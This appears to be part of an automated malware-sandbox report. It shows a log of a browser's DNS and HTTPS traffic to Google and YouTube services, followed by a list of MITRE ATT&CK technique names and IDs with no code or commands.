
216.58.201.110

172.217.169.14

216.58.213.14

142.250.187.238

142.250.187.206

172.217.169.78

142.250.179.238

142.250.180.14

172.217.169.46
8.8.8.8:53

google.com

dns

msedge.exe

56 B
72 B
1
1

DNS Request

google.com

DNS Response

172.217.16.238
8.8.8.8:53

google.com

dns

msedge.exe

56 B
72 B
1
1

DNS Request

google.com

DNS Response

172.217.16.238
8.8.8.8:53

13.59.243.192.in-addr.arpa

dns

72 B
147 B
1
1

DNS Request

13.59.243.192.in-addr.arpa
216.58.204.78:443

www.youtube.com

https

msedge.exe

32.1kB
851.7kB
153
662
8.8.8.8:53

i.ytimg.com

dns

msedge.exe

57 B
281 B
1
1

DNS Request

i.ytimg.com

DNS Response

216.58.201.118

142.250.200.54

172.217.169.22

216.58.213.22

142.250.200.22

142.250.187.246

216.58.212.246

142.250.187.214

142.250.178.22

172.217.169.54

172.217.16.246

216.58.204.86

142.250.180.22

142.250.179.246
8.8.8.8:53

accounts.google.com

dns

msedge.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

74.125.71.84
8.8.8.8:53

118.201.58.216.in-addr.arpa

dns

73 B
173 B
1
1

DNS Request

118.201.58.216.in-addr.arpa
8.8.8.8:53

74.204.58.216.in-addr.arpa

dns

72 B
171 B
1
1

DNS Request

74.204.58.216.in-addr.arpa
74.125.71.84:443

accounts.google.com

https

msedge.exe

3.3kB
12.1kB
15
18
8.8.8.8:53

84.71.125.74.in-addr.arpa

dns

71 B
104 B
1
1

DNS Request

84.71.125.74.in-addr.arpa
8.8.8.8:53

227.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

227.187.250.142.in-addr.arpa
8.8.8.8:53

www.google.com

dns

msedge.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

172.217.169.36
8.8.8.8:53

3.180.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

3.180.250.142.in-addr.arpa
8.8.8.8:53

play.google.com

dns

msedge.exe

122 B
77 B
2
1

DNS Request

play.google.com

DNS Request

play.google.com

DNS Response

142.250.187.206
8.8.8.8:53

youtube.com

dns

msedge.exe

57 B
73 B
1
1

DNS Request

youtube.com

DNS Response

216.58.212.206
8.8.8.8:53

206.212.58.216.in-addr.arpa

dns

146 B
173 B
2
1

DNS Request

206.212.58.216.in-addr.arpa

DNS Request

206.212.58.216.in-addr.arpa
142.250.187.206:443

play.google.com

https

msedge.exe

4.8kB
8.1kB
12
15
8.8.8.8:53

jnn-pa.googleapis.com

dns

msedge.exe

67 B
307 B
1
1

DNS Request

jnn-pa.googleapis.com

DNS Response

172.217.16.234

216.58.201.106

216.58.213.10

142.250.178.10

142.250.187.202

172.217.169.74

216.58.212.202

142.250.187.234

172.217.169.42

142.250.179.234

172.217.169.10

142.250.180.10

216.58.204.74

142.250.200.10

142.250.200.42
224.0.0.251:5353

506 B
8
8.8.8.8:53

206.187.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

206.187.250.142.in-addr.arpa
8.8.8.8:53

234.16.217.172.in-addr.arpa

dns

73 B
142 B
1
1

DNS Request

234.16.217.172.in-addr.arpa
172.217.16.234:443

jnn-pa.googleapis.com

https

msedge.exe

6.3kB
52.6kB
28
47
8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

56.163.245.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

56.163.245.4.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
142.250.187.206:443

play.google.com

https

4.1kB
3.4kB
9
9
216.58.204.78:443

www.youtube.com

https

7.6kB
3.3kB
12
10
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery